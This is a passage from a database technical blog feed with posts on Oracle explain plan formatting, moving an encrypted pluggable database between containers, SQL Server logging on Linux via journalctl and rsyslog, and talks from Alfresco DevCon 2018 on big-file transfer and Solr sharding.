Yann Neuhaus

Subscribe to Yann Neuhaus feed
dbi services technical blog
Updated: 1 hour 42 min ago

Explain Plan format

Wed, 2018-01-24 10:57

The DBMS_XPLAN format accepts a lot of options, which are not all documented. Here is a small recap of available information.

The minimum that is displayed is the Plan Line Id, the Operation, and the Object Name. You can add columns and/or sections with options, such as ‘rows’, optionally starting with a ‘+’ like ‘+rows’. Some options group several additional information, such ‘typical’, which is also the default, or ‘basic’, ‘all’, ‘advanced’. You can choose one of them and remove some columns, with ‘-‘, such as ‘typical -rows -bytes -cost -plan_hash -predicate -remote -parallel -partition -note’. Finally, from an cursor executed with plan statistics, you can show all execution statistics with ‘allstats’, and the last execution statistics with ‘allstats last’. Subsets of ‘allstats’ are ‘rowstats’, ‘memstats’, ‘iostats’, buffstats’.

Of course, the column/section is displayed only if the information is present.

This blog post shows what is display by which option, as of 12cR2, and probably with some missing combinations.

+plan_hash, or BASIC


PLAN_TABLE_OUTPUT
-----------------
Plan hash value: 1338588353

Plan hash value: is displayed by ‘basic +plan_hash’ or ‘typical’ or ‘all’ or ‘advanced’

+rows +bytes +cost +partition +parallel, or TYPICAL


-----------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | Pstart| Pstop | TQ/Ins |IN-OUT| PQ Distrib |
-----------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 287 | 19516 | 5 (20)| 00:00:01 | | | | | |
| 1 | PX COORDINATOR | | | | | | | | | | |
| 2 | PX SEND QC (ORDER) | :TQ10002 | 287 | 19516 | 5 (20)| 00:00:01 | | | Q1,02 | P->S | QC (ORDER) |
| 3 | SORT ORDER BY | | 287 | 19516 | 5 (20)| 00:00:01 | | | Q1,02 | PCWP | |
| 4 | PX RECEIVE | | 287 | 19516 | 4 (0)| 00:00:01 | | | Q1,02 | PCWP | |
| 5 | PX SEND RANGE | :TQ10001 | 287 | 19516 | 4 (0)| 00:00:01 | | | Q1,01 | P->P | RANGE |
|* 6 | HASH JOIN | | 287 | 19516 | 4 (0)| 00:00:01 | | | Q1,01 | PCWP | |
| 7 | PX BLOCK ITERATOR | | 14 | 532 | 2 (0)| 00:00:01 | 1 | 1 | Q1,01 | PCWC | |
| 8 | TABLE ACCESS FULL | EMP | 14 | 532 | 2 (0)| 00:00:01 | 1 | 1 | Q1,01 | PCWP | |
| 9 | BUFFER SORT | | | | | | | | Q1,01 | PCWC | |
| 10 | PX RECEIVE | | 82 | 2460 | 2 (0)| 00:00:01 | | | Q1,01 | PCWP | |
| 11 | PX SEND BROADCAST| :TQ10000 | 82 | 2460 | 2 (0)| 00:00:01 | | | | S->P | BROADCAST |
| 12 | REMOTE | DEPT | 82 | 2460 | 2 (0)| 00:00:01 | | | LOOPB~ | R->S | |
-----------------------------------------------------------------------------------------------------------------------------------

Rows or E-Rows: is displayed by ‘basic +rows’ or ‘typical’ or ‘all’ or ‘advanced’
Bytes or E-Bytes: is displayed by ‘basic +bytes’ or ‘typical’ or ‘all’ or ‘advanced’
Cost: is displayed by ‘basic +cost’ or ‘typical’ or ‘all’ or ‘advanced’
TmpSpc or E-Temp: is displayed by ‘basic +bytes’ or ‘typical’ or ‘all’ or ‘advanced’
Time or E-Time: is displayed by ‘typical’ or ‘all’ or ‘advanced’
Pstart/Pstop: is displayed by ‘basic +partition’ or ‘typical’ or ‘all’ or ‘advanced’
TQ/Ins, IN-OUT, PQ Distrib: is displayed by ‘basic +parallel’ or ‘typical’ or ‘all’ or ‘advanced’

The ‘A-‘ and ‘E-‘ prefixes are used when displaying execution statistics, to differentiate estimations with actual numbers

+alias


Query Block Name / Object Alias (identified by operation id):
-------------------------------------------------------------
 
1 - SEL$58A6D7F6
8 - SEL$58A6D7F6 / EMP@SEL$1
12 - SEL$58A6D7F6 / DEPT@SEL$1

Query Block Name / Object Alias: is displayed by ‘basic +alias’ or ‘typical +alias’ or ‘all’ or ‘advanced’

+outline


Outline Data
-------------
 
/*+
BEGIN_OUTLINE_DATA
PQ_DISTRIBUTE(@"SEL$58A6D7F6" "DEPT"@"SEL$1" NONE BROADCAST)
USE_HASH(@"SEL$58A6D7F6" "DEPT"@"SEL$1")
LEADING(@"SEL$58A6D7F6" "EMP"@"SEL$1" "DEPT"@"SEL$1")
FULL(@"SEL$58A6D7F6" "DEPT"@"SEL$1")
FULL(@"SEL$58A6D7F6" "EMP"@"SEL$1")
OUTLINE(@"SEL$1")
OUTLINE(@"SEL$2")
MERGE(@"SEL$1" >"SEL$2")
OUTLINE_LEAF(@"SEL$58A6D7F6")
ALL_ROWS
DB_VERSION('12.2.0.1')
OPTIMIZER_FEATURES_ENABLE('12.2.0.1')
IGNORE_OPTIM_EMBEDDED_HINTS
END_OUTLINE_DATA
*/

Outline Data: is displayed by ‘basic +outline’ or ‘typical +outline’ or ‘all +outline’ or ‘advanced’

+peeked_binds


Peeked Binds (identified by position):
--------------------------------------
 
1 - :X (VARCHAR2(30), CSID=873): 'x'

Peeked Binds: is displayed by ‘basic +peeked_binds’ or ‘typical +peeked_binds’ or ‘all +outline’ or ‘advanced’

+predicate


Predicate Information (identified by operation id):
---------------------------------------------------
 
6 - access("EMP"."DEPTNO"="DEPT"."DEPTNO")

Predicate Information: is displayed by ‘basic +predicate’ or ‘typical’ or ‘all’ or ‘advanced’

+column


Column Projection Information (identified by operation id):
-----------------------------------------------------------
 
1 - INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
"EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
"EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13] 2 - (#keys=0) INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
"EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
"EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13] 3 - (#keys=1) INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
"EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
"EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13] 4 - INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
"EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
"EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13]

Column Projection Information: is displayed by ‘basic +projection’ or ‘typical +projection’ or ‘all’ or ‘advanced’

+remote


Remote SQL Information (identified by operation id):
----------------------------------------------------
 
12 - SELECT "DEPTNO","DNAME","LOC" FROM "DEPT" "DEPT" (accessing 'LOOPBACK' )

Remote SQL Information: is displayed by ‘basic +remote’ or ‘typical’ or ‘all’ or ‘advanced’

+metrics


Sql Plan Directive information:
-------------------------------
 
Used directive ids:
9695481911885124390

Sql Plan Directive information: is displayed by ‘+metrics’

+note

The Note section can show information about SQL Profiles, SQL Patch, SQL Plan Baseline, Outlines, Dynamic Sampling, Degree of Parallelism, Parallel Query, Parallel DML, Create Index Size, Cardinality Feedback, Rely Constraints used for transformation, Sub-Optimal XML, Adaptive Plan, GTT private statistics,…


Note
-----
- Degree of Parallelism is 2 because of table property
- dynamic statistics used: dynamic sampling (level=2)
- 1 Sql Plan Directive used for this statement
- this is an adaptive plan (rows marked '-' are inactive)

Note: is displayed by ‘basic +note’ or ‘typical’ or ‘all’ or ‘advanced’

+adaptive


---------------------------------------------------------------------------------------
| Id | Operation | Name |Starts|E-Rows| A-Rows|
---------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 0 |
| 1 | HASH UNIQUE | | 1 | 1 | 0 |
| * 2 | HASH JOIN SEMI | | 1 | 1 | 0 |
|- 3 | NESTED LOOPS SEMI | | 1 | 1 | 7 |
|- 4 | STATISTICS COLLECTOR | | 1 | | 7 |
| * 5 | TABLE ACCESS FULL | DEPARTMENTS | 1 | 1 | 7 |
|- * 6 | TABLE ACCESS BY INDEX ROWID BATCHED| EMPLOYEES | 0 | 1 | 0 |
|- * 7 | INDEX RANGE SCAN | EMP_DEP_IX | 0 | 10 | 0 |
| * 8 | TABLE ACCESS FULL | EMPLOYEES | 1 | 1 | 1 |
---------------------------------------------------------------------------------------

Inactive branches of adaptive plan: is displayed by ‘+adaptive’

+report


Reoptimized plan:
-----------------
This cursor is marked for automatic reoptimization. The plan that is
expected to be chosen on the next execution is displayed below.

Reoptimized plan: is displayed by ‘+report’

ALLSTATS


---------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | OMem | 1Mem | O/1/M |
---------------------------------------------------------------------------------------------------------------------------

Starts: is displayed by ‘basic +rowstats’, ‘basic +allstats’
A-Rows: is displayed by ‘basic +rowstats’, ‘basic +allstats’
A-Time: is displayed by ‘typical +rowstats’, ‘basic +allstats’
Buffers, Reads, Writes: is displayed by ‘basic +buffstats’, ‘basic +iostats’, ‘basic +allstats’
OMem, 1Mem, Used-Mem, O/1/M, Used-Mem: is displayed by ‘basic +memstats’, ‘basic +allstats’
Max-Tmp,Used-Tmp is displayed by ‘basic +memstats’, ‘typical +allstats’

With summed stats, O/1/M and Max-Tmp are used for the headers. With last stats, Used-Mem and Used-Tmp.

 

Cet article Explain Plan format est apparu en premier sur Blog dbi services.

Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported)

Sat, 2018-01-20 16:16

In the Oracle Database Cloud DBaaS you provision a multitenant database where tablespaces are encrypted. This means that when you unplug/plug the pluggable databases, you also need to export /import the encryption keys. You cannot just copy the wallet because the wallet contains all CDB keys. Usually, you can be guided by the error messages, but this one needs a little explanation and an example.

Here I’ll unplug PDB6 from CDB1 and plug it into CDB2

[oracle@VM122 blogs]$ connect /@CDB1 as sysdba
SQLcl: Release 17.4.0 Production on Fri Jan 19 22:22:44 2018
Copyright (c) 1982, 2018, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
22:22:46 SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ ---------- ------------ ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
5 PDB6 READ WRITE NO

Here are the master keys:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb1 AcyH+Z... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
3 pdb6 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

Export keys and Unplug PDB

Let’s try to unplug PDB6:
22:22:51 SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
22:23:06 SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
 
Error starting at line : 1 in command -
alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml'
Error report -
ORA-46680: master keys of the container database must be exported

This message is not clear. You don’t export the container database (CDB) key. You have to export the PDB ones.

Then, I have to open the PDB, switch to it, and export the key:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB1";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 export encryption keys with secret "this is my secret password for the export"
3 to '/var/tmp/PDB6.p12'
4 identified by "k3yCDB1"
5 /
 
Key MANAGEMENT succeeded.

Note that I opened the keystore with a password. If you use an autologin wallet, you have to close it, in the CDB$ROOT, and open it with password.

Now I can unplug the database:

SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
Pluggable database PDB6 altered.

Plug PDB and Import keys

I’ll plug it in CDB2:

SQL> connect /@CDB2 as sysdba
Connected.
SQL> create pluggable database PDB6 using '/var/tmp/PDB6.xml' file_name_convert=('/CDB1/PDB6/','/CDB2/PDB6/');
Pluggable database PDB6 created.

When I open it, I get a warning:

18:05:45 SQL> alter pluggable database PDB6 open;
ORA-24344: success with compilation error
24344. 00000 - "success with compilation error"
*Cause: A sql/plsql compilation error occurred.
*Action: Return OCI_SUCCESS_WITH_INFO along with the error code
 
Pluggable database PDB6 altered.

The PDB is opened in restricted mode and then I have to import the wallet:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
6 PDB6 READ WRITE YES
 
SQL> select name,cause,type,status,message,action from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS MESSAGE ACTION
---- ----- ---- ------ ------- ------
PDB6 Wallet Key Needed ERROR PENDING PDB needs to import keys from source. Import keys from source.

Then I open the destination CDB wallet and import the PDB keys into it:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB2";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 import encryption keys with secret "this is my secret password for the export"
3 from '/var/tmp/PDB6.p12'
4 identified by "k3yCDB2"
5 with backup
6 /
 
Key MANAGEMENT succeeded.

Now the PDB can be opened for all sessions

SQL> alter session set container=CDB$ROOT;
Session altered.
 
SQL> alter pluggable database PDB6 close;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 open;
Pluggable database PDB6 altered.

Here is a confirmation that the PDB has the same key as the in the origin CDB:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb2 AdTdo9... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
4 pdb1 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

 

Cet article Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported) est apparu en premier sur Blog dbi services.

SQL Server on Linux and logging

Fri, 2018-01-19 01:39

On Windows world, SQL Server logs information both into the SQL Server error log and the Application log. Both automatically timestamp all recorded events. Unlike the SQL Server error log, the Windows application log provides an overall picture of events that occur globally on the Windows operating system. Thus, regarding the encountered issues taking a look at such event logs – by using either the Windows event viewer or the Get-EventLog PowerShell cmdlet – may be very helpful to figure out they are only SQL Server-scoped or if you have to correlate with to other operating system issues.

But what about SQL Server on Linux? Obviously, we may use the same logging technologies. As Windows, SQL Server logs information both in the SQL Server error log located on /var/opt/mssql/log/ and in Linux logs. Because SQL Server is only supported on Linux distributions that all include systemd ( RHEL 7.3+, SLES V12 SP2+ or Ubuntu 16.04+) we have to go through the journalctl command to browse the messages related to the SQL Server instance.

systemd-journald is a system service that collects and stores logging data based on logging information that is received from a variety of sources – Kernel and user log messages. All can be viewed through the journalctl command.

Let’s say that the journalctl command is very powerful and I don’t aim to cover all the possibilities. My intention is only to dig into some examples in the context of SQL Server. Conceptually this is not so different than we may usually do on Windows system for basic stuff.

Firstly, let’s say we may use a couple of options to filter records we want to display. Probably the first intuitive way to go through the journalctl command is to use time interval parameters as –since and –until as follows:

[root@sqllinux ~] journalctl --since "2018-01-16 12:00:00" --until "2018-01-16 23:30:00"

Here a sample of the corresponding output:

blog 126 - 1 - journalctl with time interval filter

All log messages are displayed including the kernel. But rather than using time interval filters we may prefer to use the -b parameter to show all log messages since the last system boot for instance:

[root@sqllinux ~] journalctl -b

The corresponding output:

blog 126 - 2 - journalctl with last boot filter

You may use different commands to get the system reboot as uptime, who -b. I’m in favour of last reboot because it provides the last reboot date rather than the uptime of the system.

Furthermore, one interesting point is that if you want to get log messages from older system boots (and not only the last one) you have to setup accordingly system-journald to enable log persistence. By default, it is volatile and logs are cleared after each system reboot. You may get this information directly from the system-journald configuration file (#Storage=auto by default):

[root@sqllinux ~] cat /etc/systemd/journald.conf
…
[Journal]
#Storage=auto
#Compress=yes
#Seal=yes
…

I remembered a customer case where I had to diagnose a database check integrity job scheduled on each Sunday and that failed randomly. We finally figure out that the root cause was a system reboot after an automatic update. But the tricky part was that not all system reboots did not lead to fail the DBCC CHECKDB command and according to the information from the Windows log we understood it depended mostly on the DBCC CHECKDB command execution time which sometimes exceeded the time scheduled for system reboot. So, in this case going back to the previous reboots (before the last one) was helpful for us. Let’s say that for some Linux distributions this is not the default option and my colleague Daniel Westermann in the dbi services open source team explained it well through his blog post and how to change the default behavior as well.

So, after applying the correct setup, if you want to display log messages after a pre-defined boot time you may first identify the different system boot times logged into the journal as follows:

[root@sqllinux ~] journalctl --list-boots
-1 576f0fb259f4433083c05329614d749e Tue 2018-01-16 15:41:15 CET—Wed 2018-01-17 20:30:41 CET
 0 ea3ec7019f8446959cfad0bba517a47e Wed 2018-01-17 20:33:30 CET—Wed 2018-01-17 20:37:05 CET

Then you may rewind the journal until the corresponding offset:

[root@sqllinux ~] journalctl -b -1 
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 20:37:40 CET. --
Jan 16 15:41:15 localhost.localdomain systemd-journal[105]: Runtime journal is using 8.0M (max allowed 188.7M, trying to leave 283.1M free
 of 1.8G available → current limit 188.7M).
….

Let’s go ahead with filtering by unit (mssql-server unit). This is likely the most useful way for DBAs to display only SQL Server related records with a combination of the aforementioned options (time interval or last boot(s) parameters). In the following example, I want to display SQL Server related records since a system boot that occurred on 18 January 2018 20:39 (I may also deal with interval time filters)

[root@sqllinux ~] journalctl -b -1 -u mssql-server.service 
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 20:39:55 CET. --
Jan 16 15:41:17 sqllinux.dbi-services.test systemd[1]: [/usr/lib/systemd/system/mssql-server.service:21] Unknown lvalue 'TasksMax' in sect
ion 'Service'
Jan 16 20:47:15 sqllinux.dbi-services.test systemd[1]: Started Microsoft SQL Server Database Engine.
Jan 16 20:47:15 sqllinux.dbi-services.test systemd[1]: Starting Microsoft SQL Server Database Engine
...
Jan 16 20:47:22 sqllinux.dbi-services.test sqlservr[1119]: 2018-01-16 20:47:22.35 Server      Microsoft SQL Server 2017 (RTM-CU2) (KB40525
74) - 14.0.3008.27 (X64)
…

You may also want to get only error concerned your SQL Server instance. If you already used syslog in the past you will still be comfortable with systemd-journal that implements the standard syslog message levels and message priorities. Indeed, each message has its own priority as shown below. The counterpart on Windows event log are event types (warning, error, critical etc …). On Linux priorities are identified by number – 6 corresponds to info messages and 3 to error messages. Here an log message’s anatomy with the priority value.

[root@sqllinux ~] journalctl -b -1 -u mssql-server.service -n 1 -o verbose
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 20:48:36 CET. --
Wed 2018-01-17 20:30:38.937388 CET [s=5903eef6a5fd45e584ce03a4ae329ac3;i=88d;b=576f0fb259f4433083c05329614d749e;m=13e34d5fcf;t=562fde1d9a1
    PRIORITY=6
    _UID=0
    _GID=0
    _BOOT_ID=576f0fb259f4433083c05329614d749e
    _MACHINE_ID=70f4e4633f754037916dfb35844b4b16
    SYSLOG_FACILITY=3
    SYSLOG_IDENTIFIER=systemd
    CODE_FILE=src/core/job.c
    CODE_FUNCTION=job_log_status_message
    RESULT=done
    _TRANSPORT=journal
    _PID=1
    _COMM=systemd
    _EXE=/usr/lib/systemd/systemd
    _CAP_EFFECTIVE=1fffffffff
    _SYSTEMD_CGROUP=/
    CODE_LINE=784
    MESSAGE_ID=9d1aaa27d60140bd96365438aad20286
    _HOSTNAME=sqllinux.dbi-services.test
    _CMDLINE=/usr/lib/systemd/systemd --switched-root --system --deserialize 21
    _SELINUX_CONTEXT=system_u:system_r:init_t:s0
    UNIT=mssql-server.service
    MESSAGE=Stopped Microsoft SQL Server Database Engine.
    _SOURCE_REALTIME_TIMESTAMP=1516217438937388

 

So, if you want to restrict more the output with only warning, error or critical messages (from a daemon point of view), you may have to add the -p option with a range of priorities from 2 (critical) and 4 (warning) as shown below:

[root@sqllinux ~] journalctl -p 2..4 -u mssql-server.service
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 21:44:04 CET. --
Jan 16 15:41:17 sqllinux.dbi-services.test systemd[1]: [/usr/lib/systemd/system/mssql-server.service:21] Unknown lvalue 'TasksMax' in sect
-- Reboot --
Jan 17 15:27:42 sqllinux.dbi-services.test systemd[1]: [/usr/lib/systemd/system/mssql-server.service:21] Unknown lvalue 'TasksMax' in sect
lines 1-4/4 (END)

Ultimately, filtering by message will be probably the most natural way to find out log messages. Let’s say in this case there is no built-in parameters or options provided by journalctl command and grep will be your friend for sure. In the following example, a classic customer case where we want to count number of failed logins during a specific period. So, I will have to use a combination of journalctl, grep and wc commands:

[root@sqllinux ~] journalctl -u mssql-server.service --since "2018-01-17 12:00:00" --until "2018-01-17 23:00:00"  | grep "Login failed" | wc -l
31

Finally, the journalctl command offers real-time capabilities to follow log messages through the -f option. For very specific cases it might be useful. In the example below I can use it to follow SQL Server related log messages:

[root@sqllinux ~] journalctl -u mssql-server.service -f
-- Logs begin at Tue 2018-01-16 15:41:15 CET. --
Jan 17 21:52:57 sqllinux.dbi-services.test sqlservr[1121]: 2018-01-17 21:52:57.97 Logon       Error: 18456, Severity: 14, State: 8.
Jan 17 21:52:57 sqllinux.dbi-services.test sqlservr[1121]: 2018-01-17 21:52:57.97 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.40.30]

 

Another topic I wanted to introduce is the centralized logging management. Nowadays, a plenty of third party tools like splunk – or built-in Microsoft tools as SCOM – may address this need both on Windows and Linux world. I also remembered a special customer case where we went through built-in Windows event forwarding mechanism. On Linux world, you may benefit from a plenty of open source tools and you may also rely on built-in Linux tools as systemd-journal-remote, systemd-journal-upload and systemd-journal-gateway as well. I will probably go further into these tools in the future but this time let’s use an older tool rsyslog that implements the basic syslog protocol and extends it with additional features. In this blog post I used a CentOS 7 distro that comes with rsyslog. The good news is that it also includes by default the imjournal module (that provides access to the systemd journal). This module reads log from /run/log/journal and then writes out /var/log/messages, /var/log/maillog, /var/log/secure or others regarding the record type. Log records may be send over TCP or UDP protocols and securing capabilities are also provided (by using TLS and certificates for instance).

Just out of curiosity, I decided to implement a very simple log message forwarding scenario to centralize only SQL Server log messages. Basically, I only had to setup some parameters in the /etc/rsyslog.conf on both sides (sender and receiver servers) as well as applying some firewall rules to allow the traffic on port 514. In addition, I used TCP protocol because this is probably the simplest way to send log messages (because corresponding module are already loaded). Here an illustration of my scenario:

blog 126 - 3 - rsyslog architecture

Here the configuration settings of my log message sender. You may notice that I used expression-Based filters to filter and to send only my SQL Server instance related messages :

[root@sqllinux ~] cat /etc/rsyslog.conf
#### MODULES ####

# The imjournal module bellow is now used as a message source instead of imuxsock.
$ModLoad imuxsock # provides support for local system logging (e.g. via logger command)
$ModLoad imjournal # provides access to the systemd journal
#$ModLoad imklog # reads kernel messages (the same are read from journald)
#$ModLoad immark  # provides --MARK-- message capability
…
# remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional
#*.* @@remote-host:514
if $programname == 'sqlservr' then @@192.168.40.21:514 
…

On the receiver side I configured rsyslog daemon to accept messages that come from TCP protocol and port 514. Here a sample (only the interesting part) of the configuration file:

[root@sqllinux2 ~] cat /etc/rsyslog.conf
…
# Provides TCP syslog reception
$ModLoad imtcp
$InputTCPServerRun 514

 

Finally, I ran a simple test to check if the log message forwarding process works correctly by using the following T-SQL command from my SQLLINUX instance …

RAISERROR('test syslog from SQLLINUX instance', 10, 1) WITH LOG

 

… and after jumping to the receiver side (SQLLINUX2) I used the tail command to check if my message was sent correctly:

[root@sqllinux2 ~] tail -f /var/log/messages
…
Jan 18 21:50:40 sqllinux sqlservr: 2018-01-18 21:50:40.66 spid57      test syslog
Jan 18 21:51:03 sqllinux sqlservr: 2018-01-18 21:51:03.75 spid57      test syslog 1 2 3
Jan 18 21:52:08 sqllinux sqlservr: 2018-01-18 21:52:08.74 spid52      Using 'dbghelp.dll' version '4.0.5'
Jan 18 21:56:31 sqllinux sqlservr: 2018-01-18 21:56:31.13 spid57      test syslog from SQLLINUX instance

Well done!
In this blog post we’ve surfaced how SQL Server deals with Linux logging system and how we may use the journalctl command to find out information for troubleshooting. Moving from Windows to Linux in this field remains straightforward with finally the same basics. Obviously, Linux is a command-line oriented operating system so you will not escape to use them :-)

 

Cet article SQL Server on Linux and logging est apparu en premier sur Blog dbi services.

Alfresco DevCon 2018 – Day 2 – Big files, Solr Sharding and Minecraft, again!

Thu, 2018-01-18 13:46

Today is the second day of the Alfresco DevCon 2018 and therefore yes, it is already over, unfortunately. In this blog, I will be continuing my previous one with sessions I attended on the afternoon of the day-1 as well as day-2. There were too many interesting sessions and I don’t really have the time to talk about all of them… But if you are interested, all the sessions were recorded (as always) so wait a little bit and check out the DevCon website, the Alfresco Community or the Alfresco Youtube channel and I’m sure you will find all the recordings as soon as they are available.

 

So on the afternoon of the day-1, I started with a presentation of Jeff Potts, you all know him, and he was talking about how to move in (upload) and out (download) of Alfresco some gigantic files (several gigabytes). He basically presented a use case where the users had to manage big files and put them all in Alfresco with the less headache possible. On the paper, Alfresco can handle any file no matter the size because the only limit is what the File System of the Alfresco Server supports. However, when you start working with 10 or 20 GB files, you can sometimes have issues like exceptions, timeouts, network outage, aso… It might not be frequent but it can happen for a variety of reasons (not always linked to Alfresco). The use case here was to simplify the import into Alfresco and make it faster. Jeff tested a lot of possible solutions like using the Desktop Sync, CMIS, FTP, the resumable upload share add-on, aso…

In the end, a pure simple (1 stream) upload/download will always be limited by the network. So he tried to work on improving this part and used the Resilio Sync software (formerly BitTorrent Sync). This tool can be used to stream a file to the Alfresco Server, BitTorrent style (P2P). But the main problem of this solution is that P2P is only as good as the number of users having this specific file available on their workstation… Depending on the use case, it might increase the performance but it wasn’t ideal.

In the end, Jeff came across the protocol “GridFTP”. This is an extension of the FTP for grid computing whose purpose is to make the file transfer more reliable and faster using multiple simultaneous TCP streams. There are several implementations of the GridFTP like the Globus Toolkit. Basically, the solution in this case was to use Globus to transfer the big files from the user’s workstation to a dedicated File System which is mounted on the Alfresco Server. Then using the Alfresco Bulk FileSystem Import Tool (BFSIT), it is really fast to import documents into Alfresco, as soon as they are on the File System of the Alfresco Server. For the download, it is just the opposite (using the BFSET)…

For files smaller than 512Mb, this solution is probably slower than the default Alfresco upload/download actions but for bigger files (or group of files), then it becomes very interesting. Jeff did some tests and basically for one or several files with a total size of 3 or 4GB, then the transfer using Globus and then the import into Alfresco was 50 to 60% faster than the Alfresco default upload/download.

 

Later, Jose Portillo shared Solr Sharding Best Practices. Sharding is the action of splitting your indexes into Shards (part of an index) to increase the searches and indexing (horizontal scaling). The Shards can be stored on a single Solr Server or they can be dispatched on several. Doing this basically increase the search speed because the search is executed on all Shards. For the indexing of a single node, there is no big difference but for a full reindex, it does increase a lot the performance because you do index several nodes at the same time on each Shards…

A single Shard can work well (according to the Alfresco Benchmark) with up to 50M documents. Therefore, using Shards is mainly for big repositories but it doesn’t mean that there are no use cases where it would be interesting for smaller repositories, there are! If you want to increase your search/index performance, then start creating Shards much earlier.

For the Solr Sharding, there are two registration options:

  • Manual Sharding => You need to manually configure the IPs/Host where the Shards are located in the Alfresco properties files
  • Dynamic Sharding => Easier to setup and Alfresco automatically provide information regarding the Shards on the Admin interface for easy management

There are several methods of Shardings which are summarized here:

  • MOD_ACL_ID (ACL v1) => Sharding based on ACL. If all documents have the same ACL (same site for example), then they will all be on the same Shard, which might not be very useful…
  • ACL_ID (ACL v2) => Same as v1 except that it uses the murmur hash of the ACL ID and not its modulus
  • DB_ID (DB ID) => Default in Solr6. Nodes are evenly distributed on the Shards based on their DB ID
  • DB_ID_RANGE (DB ID Range) => You can define the DB ID range for which nodes will go to which Shard (E.g.: 1 to 10M => Shard-0 / 10M to 20M => Shard-1 / aso…)
  • DATE (Date and Time) => Assign date for each Shards based on the month. It is possible to group some months together and assign a group per Shard
  • PROPERTY (Metadata) => The value of some property is hashed and this hash is used for the assignment to a Shard so all nodes with the same value are in the same Shard
  • EXPLICIT (?) => This is an all-new method that isn’t yet on the documentation… Since there aren’t any information about this except on the source code, I asked Jose to provide me some information about what this is doing. He’ll look at the source code and I will update this blog post as soon as I receive some information!

Unfortunately, the Solr Sharding has only been available starting with Alfresco Content Services 5.1 (Solr 4) and only using the ACL v1 method. New methods were then added using the Alfresco Search Services (Solr 6). The availability of methods VS Alfresco/Solr versions has been summarized in Jose’s presentation:

DevCon2018_ShardingMethodsAvailability

Jose also shared a comparison matrix of the different methods to choose the right one for each use case:

DevCon2018_ShardingMethodsFeatures

Some other best practices regarding the Solr Sharding:

